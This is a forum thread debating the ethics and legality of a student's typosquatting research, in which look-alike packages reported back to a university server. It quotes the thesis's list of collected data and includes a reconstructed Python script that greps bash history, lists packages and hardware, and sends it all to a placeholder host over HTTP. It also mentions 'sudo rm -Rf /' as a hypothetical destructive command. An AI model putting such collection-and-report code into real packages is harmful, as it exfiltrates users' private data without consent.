It’s not clear if the experiment broke ethical or even legal boundaries, since it relied on confusion if not outright deceit to trick people into installing something other than what they intended to install. Still, the lesson the experiment imparts is worth heeding.

I’m not sure I understand what “ethical or even legal boundaries” they are implying were broken here. The article doesn’t go into detail about what the script he wrote does; if it were something malicious, that would make more sense. But if I read it correctly, he basically wrote a script that shows a warning message telling the developer about their mistake and pings home to register the download, in order to measure how large the attack vector was. Am I missing something, or is the article trying to make things sound way more interesting than they really were?

I think the article is just being bombastic. I don’t see anything unethical about it, it’s basically how all computer security research works.

That being said, judging from the recent CFAA cases, it probably would be considered illegal by US law. It’s a good thing the student lives in Germany and not the US, or they might be looking at jail time (especially since the package infected .mil domains).

I would argue that the specifics of what he did were both unethical and illegal. Illegal by the letter of the Computer Fraud and Abuse Act, as you mentioned: he certainly exceeded authorized access on the machines that downloaded his fraudulent packages, since the users had no expectation that downloading the packages would result in a search of their machines or transmission of data to some outside location. Unethical because his packages scanned users’ machines, including command history, with the potential for accidental disclosure of private information. I understand that he had some personal justification for this in the context of his research, but without permission (which would likely have had to be given by the users when they first accessed the package manager, perhaps with some sort of credential system to track their having opted in to experiments that may expose personal information), this definitely seems like a breach of reasonable ethical practices in the security field.

It’s on page 23 of the thesis for which this work was done. Here’s the quote listing what the fraudulent packages collected and transmitted back to the university machine. Note that all data was transmitted unencrypted over HTTP as the query string of a GET request.

The typosquatted package name and the (assumed) correct name of the package. This information was hard-coded in the notification program before the package was distributed. Example: coffe-script and coffee-script (correct name).

The package manager name and version that triggered the operation. The package manager name was also hard-coded, before the package was uploaded. The package manager version was retrieved dynamically. Example: pip and the output of the command pip --version

The operating system and architecture of the host. Example: Linux-3.14.48

A Boolean flag that indicates whether the code was run with administrative rights. Getting this information on Windows systems is not trivial and possibly error-prone.

The past command history of the current user that contains the package manager name as a substring. This information could only be retrieved from unixoid systems, because Windows systems do not store shell command history data. Example: Output of the shell command grep "pip[23]? install" ~/.bash_history

A list of the packages installed with the package manager.

Hardware information of the host. Example: Output of lspci on Linux. On OS X, the output of system_profiler -detailLevel mini was taken.
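To make the list above concrete, here is a rough reconstruction of the kind of collection-and-report step the thesis describes. This is a hypothetical sketch, not the actual notification program: the endpoint URL, function names, and package names are invented for illustration, and the individual commands are the examples given in the quote.

```python
# Hypothetical sketch of the data collection the thesis describes.
# The URL and all names here are invented; only the categories of
# collected data come from the thesis excerpt above.
import os
import platform
import subprocess
import urllib.parse
import urllib.request

TYPO_NAME = "coffe-script"   # hard-coded before distribution
REAL_NAME = "coffee-script"  # assumed correct package name
MANAGER = "pip"              # hard-coded package manager name

def run(cmd):
    """Run a shell command, returning its output or "" on any failure."""
    try:
        return subprocess.check_output(cmd, shell=True, text=True).strip()
    except Exception:
        return ""

def collect():
    return {
        "typo": TYPO_NAME,
        "real": REAL_NAME,
        "manager": MANAGER,
        "manager_version": run("pip --version"),
        "platform": platform.platform(),  # e.g. Linux-3.14.48
        "is_admin": str(os.geteuid() == 0) if hasattr(os, "geteuid") else "unknown",
        "history": run('grep "pip[23]\\? install" ~/.bash_history'),
        "installed": run("pip freeze"),
        "hardware": run("lspci"),
    }

def phone_home(data):
    # Per the thesis, everything went back unencrypted over plain HTTP
    # as the query string of a GET request.
    query = urllib.parse.urlencode(data)
    urllib.request.urlopen("http://example.invalid/register?" + query)
```

Note how little machinery this takes: a handful of shell commands and one GET request, which is part of why the bash-history item below drew so much criticism.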

I suppose I should have been more precise. The type of data collection the program performed, in particular grepping the bash history of any Linux machine for commands containing the name of the package manager and then transmitting the result of that search to a remote machine, is probably behavior the average user would not expect.

A Ruby gem that computes and installs dependencies is not even remotely the same thing as what happened here.

I absolutely do not expect installing a package or gem will scrape arbitrary information from my system and send it to an unknown third party, and I don’t think many people do expect that or think it’s okay.

Seems a little risky to run arbitrary commands on people’s dev machines.

Imagine somebody had replaced a command he used with a script that ran “sudo rm -Rf /”. Sure, it’s very unlikely, but there’s nothing stopping them, and suddenly his research project would be guilty of destroying data.

That doesn’t really make any sense. You could make the same argument that a Rubygem which calls File.read would be guilty of destroying data if a user had monkeypatched their Ruby standard library to delete files. Why should shell commands be treated differently from API calls?
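The parallel is easy to demonstrate: a command resolved through $PATH is exactly as replaceable as a monkeypatched library function. A minimal sketch on a unixoid system (the shadowed command name is arbitrary, and this only illustrates the lookup mechanism):

```python
# A command resolved through $PATH can be shadowed just like a
# monkeypatched API call. The fake "lspci" here is invented purely
# to demonstrate the lookup mechanism.
import os
import stat
import subprocess
import tempfile

def run_shadowed(cmd="lspci"):
    """Shadow `cmd` with a fake script earlier in PATH, then run it."""
    with tempfile.TemporaryDirectory() as d:
        fake = os.path.join(d, cmd)
        with open(fake, "w") as f:
            f.write("#!/bin/sh\necho shadowed\n")
        os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR)
        # Prepend our directory so the shadow wins the PATH search.
        env = dict(os.environ, PATH=d + os.pathsep + os.environ.get("PATH", ""))
        result = subprocess.run([cmd], env=env, capture_output=True, text=True)
        return result.stdout.strip()

print(run_shadowed())  # prints "shadowed", not the real lspci output
```

The same indirection exists either way; whether you call it a shell command or an API call, you are trusting the environment you run in.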

That said, the part where he scanned the user’s shell history definitely crossed the line.